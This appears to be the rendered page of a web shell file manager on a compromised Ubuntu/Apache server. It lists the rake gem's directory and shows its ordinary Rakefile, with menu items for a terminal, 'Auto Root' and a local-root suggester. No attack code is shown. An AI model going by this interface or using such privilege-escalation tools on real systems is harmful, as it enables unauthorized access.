Linux tsuru-no-tsurugi 5.15.0-186-generic #196-Ubuntu SMP Sat Jun 20 16:09:34 UTC 2026 x86_64
Apache/2.4.52 (Ubuntu)
Server IP : 192.168.0.18 & Your IP : 216.73.217.105
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib /
ruby /
gems /
3.0.0 /
gems /
rake-13.0.3 /
Delete
Unzip
Name
Size
Permission
Date
Action
bin
[ DIR ]
drwxr-xr-x
2026-07-06 06:50
doc
[ DIR ]
drwxr-xr-x
2026-07-06 06:50
exe
[ DIR ]
drwxr-xr-x
2026-07-06 06:50
lib
[ DIR ]
drwxr-xr-x
2026-07-06 06:50
CONTRIBUTING.rdoc
1.18
KB
-rw-r--r--
2021-07-07 19:08
Gemfile
133
B
-rw-r--r--
2021-07-07 19:08
History.rdoc
70.32
KB
-rw-r--r--
2021-07-07 19:08
MIT-LICENSE
1.03
KB
-rw-r--r--
2021-07-07 19:08
README.rdoc
4.84
KB
-rw-r--r--
2021-07-07 19:08
Rakefile
965
B
-rw-r--r--
2021-07-07 19:08
Save
Rename
# Rakefile for rake -*- ruby -*- # Copyright 2003, 2004, 2005 by Jim Weirich (jim@weirichhouse.org) # All rights reserved. # This file may be distributed under an MIT style license. See # MIT-LICENSE for details. lib = File.expand_path("../lib", __FILE__) $LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib) begin require "bundler/gem_tasks" rescue LoadError end require "rake/testtask" Rake::TestTask.new(:test) do |t| t.libs << "test" t.verbose = true t.test_files = FileList["test/**/test_*.rb"] end require "rdoc/task" RDoc::Task.new do |doc| doc.main = "README.rdoc" doc.title = "Rake -- Ruby Make" doc.rdoc_files = FileList.new %w[lib MIT-LICENSE doc/**/*.rdoc *.rdoc] doc.rdoc_dir = "html" end task ghpages: :rdoc do %x[git checkout gh-pages] require "fileutils" FileUtils.rm_rf "/tmp/html" FileUtils.mv "html", "/tmp" FileUtils.rm_rf "*" FileUtils.cp_r Dir.glob("/tmp/html/*"), "." end task default: :test